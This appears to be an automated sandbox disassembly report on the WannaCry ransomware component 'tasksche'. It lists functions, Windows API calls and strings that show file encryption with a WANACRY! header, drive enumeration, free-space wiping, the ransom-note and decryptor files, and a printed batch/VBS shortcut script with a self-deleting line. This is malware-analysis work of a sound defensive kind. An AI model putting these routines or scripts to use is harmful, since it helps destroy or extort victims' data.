    Function 10004420, Relevance: 1.5, APIs: 1, Instructions: 8
    APIs
    • CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100057C0, Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 227
    APIs
      • Part of subcall function 10001590: ??2@YAPAXI@Z.MSVCRT ref: 100015FC
      • Part of subcall function 10001830: GlobalAlloc.KERNEL32(00000000,00100000,10005340,00000000,76E6C426,00000000,1000580C,00000000.pky,10005340,1000DD8C,76E6DE72), ref: 10001869
      • Part of subcall function 10001830: GlobalAlloc.KERNEL32(00000000,00100000), ref: 10001881
      • Part of subcall function 10001830: InitializeCriticalSection.KERNEL32(?), ref: 10001899
      • Part of subcall function 10001830: CreateThread.KERNEL32(00000000,00000000,100029E0,?,00000000,00000000), ref: 100018AD
      • Part of subcall function 10001830: GetTickCount.KERNEL32 ref: 100018CD
      • Part of subcall function 10001830: srand.MSVCRT ref: 100018D4
    • GetFileAttributesA.KERNEL32(f.wnry,00000000.pky,10005340,1000DD8C,76E6DE72), ref: 10005819
    • time.MSVCRT ref: 1000583D
    • sprintf.MSVCRT ref: 1000585F
      • Part of subcall function 10001000: fopen.MSVCRT ref: 1000101B
      • Part of subcall function 10001000: fread.MSVCRT ref: 1000103B
      • Part of subcall function 10001000: fwrite.MSVCRT ref: 10001048
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001056
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001064
      • Part of subcall function 10004CD0: GetFileAttributesW.KERNEL32(@WanaDecryptor@.exe,00000000), ref: 10004CE2
      • Part of subcall function 10004CD0: CopyFileA.KERNEL32(u.wnry,@WanaDecryptor@.exe,00000000), ref: 10004CF5
      • Part of subcall function 10004CD0: GetFileAttributesW.KERNEL32(@WanaDecryptor@.exe.lnk), ref: 10004D00
      • Part of subcall function 10004CD0: GetCurrentDirectoryA.KERNEL32(00000208,?,76E6C426), ref: 10004D45
      • Part of subcall function 10004CD0: sprintf.MSVCRT ref: 10004DC2
      • Part of subcall function 10004DF0: GetFileAttributesW.KERNEL32(@Please_Read_Me@.txt,76E6C426,00000000,00000000,1000588E), ref: 10004E02
      • Part of subcall function 10004DF0: fopen.MSVCRT ref: 10004E1B
      • Part of subcall function 10004DF0: fread.MSVCRT ref: 10004E50
      • Part of subcall function 10004DF0: fclose.MSVCRT ref: 10004E5D
      • Part of subcall function 10004DF0: _wfopen.MSVCRT ref: 10004E69
      • Part of subcall function 10004DF0: _ftol.MSVCRT ref: 10004E8B
      • Part of subcall function 10004DF0: sprintf.MSVCRT ref: 10004EA1
      • Part of subcall function 10004DF0: sprintf.MSVCRT ref: 10004EC4
      • Part of subcall function 10004DF0: sprintf.MSVCRT ref: 10004EE5
      • Part of subcall function 10004DF0: fwrite.MSVCRT ref: 10004F03
      • Part of subcall function 10004DF0: fclose.MSVCRT ref: 10004F0A
      • Part of subcall function 10005480: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,76E6C426), ref: 100054B6
      • Part of subcall function 10005480: wcslen.MSVCRT ref: 100054C3
      • Part of subcall function 10005480: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 100054F5
      • Part of subcall function 10005480: wcslen.MSVCRT ref: 100054FC
    • InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100058C1
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    • GetLogicalDrives.KERNEL32 ref: 1000591C
    • GetDriveTypeW.KERNEL32(?), ref: 10005964
    • GetDriveTypeW.KERNEL32(?), ref: 10005977
      • Part of subcall function 10005540: InterlockedExchangeAdd.KERNEL32(1000D4E4,00000000), ref: 1000557E
      • Part of subcall function 10005540: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 100055AE
      • Part of subcall function 10005540: Sleep.KERNEL32(000003E8), ref: 100055CB
      • Part of subcall function 10005540: GetDriveTypeW.KERNEL32(?), ref: 100055E9
      • Part of subcall function 10005540: GetDriveTypeW.KERNEL32(00000000,00000000,00000019,76E6EEF2,00000000), ref: 100055FD
      • Part of subcall function 10005540: InterlockedExchange.KERNEL32(1000D4E4,?), ref: 1000560A
      • Part of subcall function 10005540: GetDriveTypeW.KERNEL32(?), ref: 10005615
    • InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100059A4
      • Part of subcall function 10004A40: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10004A97
      • Part of subcall function 10004A40: wcslen.MSVCRT ref: 10004A9E
      • Part of subcall function 10004A40: wcsrchr.MSVCRT ref: 10004AC0
      • Part of subcall function 10004A40: wcschr.MSVCRT ref: 10004AE9
      • Part of subcall function 10004A40: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 10004B1B
      • Part of subcall function 10004A40: wcslen.MSVCRT ref: 10004B25
      • Part of subcall function 10004A40: wcsrchr.MSVCRT ref: 10004B3D
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\*.*,?), ref: 10004B87
      • Part of subcall function 10004A40: FindFirstFileW.KERNEL32(?,?), ref: 10004BA0
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004BD7
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004BF5
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\%s\%s,?,?,-00000002), ref: 10004C2F
      • Part of subcall function 10004A40: wcscmp.MSVCRT ref: 10004C51
      • Part of subcall function 10004A40: swprintf.MSVCRT(?,%s\%s\%s,?,?,00000000), ref: 10004C79
      • Part of subcall function 10004A40: FindNextFileW.KERNEL32(?,?), ref: 10004CA2
      • Part of subcall function 10004A40: FindClose.KERNEL32(?), ref: 10004CB5
    • sprintf.MSVCRT ref: 100059DD
    • time.MSVCRT ref: 100059F6
      • Part of subcall function 10004730: CreateFileA.KERNEL32(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10004749
      • Part of subcall function 10004730: WriteFile.KERNEL32(00000000), ref: 10004775
      • Part of subcall function 10004730: CloseHandle.KERNEL32(00000000), ref: 1000477C
    • sprintf.MSVCRT ref: 10005A1F
      • Part of subcall function 10005190: GetDriveTypeW.KERNEL32(00000000,00000001,00000000,00000000), ref: 100051C0
      • Part of subcall function 10005190: GlobalAlloc.KERNEL32(00000000,00A00000), ref: 100051D6
      • Part of subcall function 10005190: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 1000522C
      • Part of subcall function 10005190: GlobalFree.KERNEL32(00000000), ref: 1000523A
      • Part of subcall function 10005190: MoveFileExW.KERNEL32(?,00000000,00000004), ref: 10005254
      • Part of subcall function 10005190: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 1000527D
      • Part of subcall function 10005190: WriteFile.KERNEL32(00000000,00000000,00A00000,?,00000000), ref: 100052A9
      • Part of subcall function 10005190: Sleep.KERNEL32(0000000A), ref: 100052B5
      • Part of subcall function 10005190: Sleep.KERNEL32(00002710), ref: 100052C2
      • Part of subcall function 10005190: GlobalFree.KERNEL32(00000000), ref: 100052CE
      • Part of subcall function 10005190: FlushFileBuffers.KERNEL32(00000000), ref: 100052D5
      • Part of subcall function 10005190: CloseHandle.KERNEL32(00000000), ref: 100052DC
      • Part of subcall function 10005190: DeleteFileW.KERNEL32(?), ref: 100052E7
    • GetDriveTypeW.KERNEL32(?), ref: 10005A7D
    • Sleep.KERNEL32(0000EA60), ref: 10005A98
      • Part of subcall function 10001680: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,00000000,76E6C426,76E6EA18,00000000,?,00000000,10006DEF,000000FF,10005AC5), ref: 100016DD
      • Part of subcall function 10001680: ??3@YAXPAX@Z.MSVCRT ref: 100016E4
      • Part of subcall function 10001680: ??3@YAXPAX@Z.MSVCRT ref: 10001705
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100032C0, Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 133
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100029F0, Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 130
    APIs
    • Sleep.KERNEL32(000003E8,?,?,?,?,100029E9), ref: 10002A17
    • EnterCriticalSection.KERNEL32(?,?,?,?,?,100029E9), ref: 10002A36
    • wcslen.MSVCRT ref: 10002A69
    • MoveFileExW.KERNEL32(69501440,?,00000001), ref: 10002A7A
    • GetFileAttributesW.KERNEL32(?), ref: 10002A85
    • GetFileAttributesW.KERNEL32(?), ref: 10002A91
    • SetFileAttributesW.KERNEL32(?,00000000), ref: 10002A9B
    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 10002AA5
    • swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 10002ACD
    • MoveFileExW.KERNEL32(69501440,?,00000001), ref: 10002ADA
    • DeleteFileW.KERNEL32(69501440), ref: 10002AE5
    • GetFileAttributesW.KERNEL32(69501440), ref: 10002AF0
    • SetFileAttributesW.KERNEL32(69501440,00000000), ref: 10002AFA
    • MoveFileExW.KERNEL32(69501440,00000000,00000004), ref: 10002B04
    • ??3@YAXPAX@Z.MSVCRT ref: 10002B3E
    • ??3@YAXPAX@Z.MSVCRT ref: 10002B50
    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100029E9), ref: 10002B76
    • ExitThread.KERNEL32 ref: 10002B89
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004DF0, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 89
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003410, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72
    APIs
      • Part of subcall function 10004440: LoadLibraryA.KERNEL32(advapi32.dll), ref: 10004456
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?), ref: 10004473
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 10004480
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 1000448D
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 1000449A
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 100044A7
      • Part of subcall function 10004440: GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 100044B4
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 10003433
    • GetProcAddress.KERNEL32(00000000,CreateFileW,?), ref: 10003450
    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 1000345D
    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 1000346A
    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 10003477
    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 10003484
    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 10003491
    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 1000349E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005190, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 117
    APIs
    • GetDriveTypeW.KERNEL32(00000000,00000001,00000000,00000000), ref: 100051C0
    • GlobalAlloc.KERNEL32(00000000,00A00000), ref: 100051D6
      • Part of subcall function 10005120: swprintf.MSVCRT(?,%s\hibsys%s,?,.WNCRYT), ref: 1000516A
      • Part of subcall function 10005120: DeleteFileW.KERNEL32(?), ref: 10005174
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 1000522C
    • GlobalFree.KERNEL32(00000000), ref: 1000523A
    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 10005254
    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 1000527D
    • WriteFile.KERNEL32(00000000,00000000,00A00000,?,00000000), ref: 100052A9
    • Sleep.KERNEL32(0000000A), ref: 100052B5
    • Sleep.KERNEL32(00002710), ref: 100052C2
    • GlobalFree.KERNEL32(00000000), ref: 100052CE
    • FlushFileBuffers.KERNEL32(00000000), ref: 100052D5
    • CloseHandle.KERNEL32(00000000), ref: 100052DC
    • DeleteFileW.KERNEL32(?), ref: 100052E7
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10002D60, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 108
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003010, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 188
    APIs
    • GetFileAttributesW.KERNEL32(?,768ED335,?,?,10002BEC,?,?,?,10006E59,000000FF,100022E7,?), ref: 10003025
    • SetFileAttributesW.KERNEL32(?,00000000), ref: 10003044
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 10003059
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1000308A
    • GetFileSizeEx.KERNEL32(00000000,?,00000000), ref: 100030AA
      • Part of subcall function 10004420: CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
    • SetFilePointer.KERNEL32(00000000,FFFFFC00,00000000,00000002), ref: 1000314C
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000316F
    • FlushFileBuffers.KERNEL32(00000000), ref: 10003176
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 10003183
    • WriteFile.KERNEL32(00000000,?,00040000,?,00000000), ref: 100031C8
    • CloseHandle.KERNEL32(00000000), ref: 100031EA
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004CD0, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 88
    APIs
    • GetFileAttributesW.KERNEL32(@WanaDecryptor@.exe,00000000), ref: 10004CE2
    • CopyFileA.KERNEL32(u.wnry,@WanaDecryptor@.exe,00000000), ref: 10004CF5
    • GetFileAttributesW.KERNEL32(@WanaDecryptor@.exe.lnk), ref: 10004D00
    • GetCurrentDirectoryA.KERNEL32(00000208,?,76E6C426), ref: 10004D45
    • sprintf.MSVCRT ref: 10004DC2
      • Part of subcall function 10001140: GetTickCount.KERNEL32(@echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs), ref: 10001147
      • Part of subcall function 10001140: srand.MSVCRT ref: 1000114E
      • Part of subcall function 10001140: time.MSVCRT ref: 10001156
      • Part of subcall function 10001140: rand.MSVCRT ref: 10001160
      • Part of subcall function 10001140: sprintf.MSVCRT ref: 10001171
      • Part of subcall function 10001140: fopen.MSVCRT ref: 10001181
      • Part of subcall function 10001140: fprintf.MSVCRT ref: 100011A6
      • Part of subcall function 10001140: fclose.MSVCRT ref: 100011AD
    Strings
    • @WanaDecryptor@.exe, xrefs: 10004CDD
    • @WanaDecryptor@.exe.lnk, xrefs: 10004DAC
    • @echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs, xrefs: 10004D11
    • u.wnry, xrefs: 10004CF0
    • \, xrefs: 10004D67
    • @WanaDecryptor@.exe.lnk, xrefs: 10004CFB
    • @WanaDecryptor@.exe, xrefs: 10004CEB, 10004DA2
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005060, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 62
    APIs
    • GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
    • GetTempPathW.KERNEL32(00000104,?), ref: 10005094
    • wcslen.MSVCRT ref: 100050A1
    • wcslen.MSVCRT ref: 100050AB
    • wcslen.MSVCRT ref: 100050B9
    • swprintf.MSVCRT(?,%C:\%s,?,$RECYCLE), ref: 100050DC
    • CreateDirectoryW.KERNEL32(?,00000000), ref: 100050E8
    • sprintf.MSVCRT ref: 100050FE
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10002200, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 83
    APIs
    • wcscpy.MSVCRT ref: 1000222D
    • wcsrchr.MSVCRT ref: 10002236
    • _wcsicmp.MSVCRT ref: 1000224B
    • wcscpy.MSVCRT ref: 1000225E
    • wcscat.MSVCRT ref: 1000226F
    • swprintf.MSVCRT(?,%s%s,?,.WNCYR,?,?,?,?), ref: 10002291
    • GetFileAttributesW.KERNEL32(?), ref: 1000229F
    • DeleteFileW.KERNEL32(?,?,?,?), ref: 100022C3
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002BD9
      • Part of subcall function 10002BA0: EnterCriticalSection.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002BFA
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002C15
      • Part of subcall function 10002BA0: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 10002C23
      • Part of subcall function 10002BA0: ??2@YAPAXI@Z.MSVCRT ref: 10002C57
      • Part of subcall function 10002BA0: LeaveCriticalSection.KERNEL32(?), ref: 10002CB8
      • Part of subcall function 10002BA0: ??3@YAXPAX@Z.MSVCRT ref: 10002CD6
      • Part of subcall function 10002BA0: LeaveCriticalSection.KERNEL32(?), ref: 10002CE3
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002D04
      • Part of subcall function 10002BA0: DeleteFileW.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002D12
      • Part of subcall function 10001960: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001A21
      • Part of subcall function 10001960: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001A57
      • Part of subcall function 10001960: GetFileSizeEx.KERNEL32(00000000,?,?,?), ref: 10001A7C
      • Part of subcall function 10001960: GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 10001AA7
      • Part of subcall function 10001960: ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 10001AC0
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 10001B00
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 10001B3A
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 10001B5D
      • Part of subcall function 10001960: _local_unwind2.MSVCRT ref: 10001B78
      • Part of subcall function 10001960: SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 10001BAB
      • Part of subcall function 10001960: swprintf.MSVCRT(?,%s%s,?,1000CBE4,?,?), ref: 10001BCC
      • Part of subcall function 10001960: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10001BEE
      • Part of subcall function 10001960: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 10001C1A
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 10001C71
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?), ref: 10001C96
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00010000,?,00000000), ref: 10001CAE
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 10001CDF
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001CFB
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 10001D20
      • Part of subcall function 10001960: rand.MSVCRT ref: 10001D54
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,WANACRY!,00000008,00010000,00000000), ref: 10001E22
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,00000200,00000004,00010000,00000000), ref: 10001E43
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00000200,00010000,00000000), ref: 10001E69
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,00000004,00000004,00010000,00000000), ref: 10001E87
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00000008,00010000,00000000), ref: 10001EA8
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,FFFF0000,00000000,00000002,?,?), ref: 10001EEF
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001F0B
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001F5C
      • Part of subcall function 10001960: SetFilePointer.KERNEL32(?,00010000,00000000,00000000,?,?), ref: 10001F84
      • Part of subcall function 10001960: ReadFile.KERNEL32(?,?,00100000,00010000,00000000), ref: 10001FE8
      • Part of subcall function 10001960: WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10002072
      • Part of subcall function 10001960: _local_unwind2.MSVCRT ref: 1000208E
      • Part of subcall function 10001960: SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 100020CD
      • Part of subcall function 10001960: CloseHandle.KERNEL32(?), ref: 100020DA
      • Part of subcall function 10001960: CloseHandle.KERNEL32(?), ref: 100020E1
      • Part of subcall function 10001960: MoveFileW.KERNEL32(?,?), ref: 10002101
      • Part of subcall function 10001960: SetFileAttributesW.KERNELBASE(?,00000080,?,?), ref: 10002119
      • Part of subcall function 10001960: DeleteFileW.KERNEL32(?,?,?), ref: 10002128
      • Part of subcall function 10001960: CloseHandle.KERNEL32(?), ref: 10002130
      • Part of subcall function 10001960: MoveFileW.KERNEL32(?,?), ref: 1000214D
      • Part of subcall function 10001960: _local_unwind2.MSVCRT ref: 1000218F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10001140, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 42
    APIs
    • GetTickCount.KERNEL32(@echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs), ref: 10001147
    • srand.MSVCRT ref: 1000114E
    • time.MSVCRT ref: 10001156
    • rand.MSVCRT ref: 10001160
    • sprintf.MSVCRT ref: 10001171
    • fopen.MSVCRT ref: 10001181
    • fprintf.MSVCRT ref: 100011A6
    • fclose.MSVCRT ref: 100011AD
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    Strings
    • @echo offecho SET ow = WScript.CreateObject("WScript.Shell")> m.vbsecho SET om = ow.CreateShortcut("%s%s")>> m.vbsecho om.TargetPath = "%s%s">> m.vbsecho om.Save>> m.vbscscript.exe //nologo m.vbsdel m.vbs, xrefs: 10001146
    • %sdel /a %%0, xrefs: 100011A0
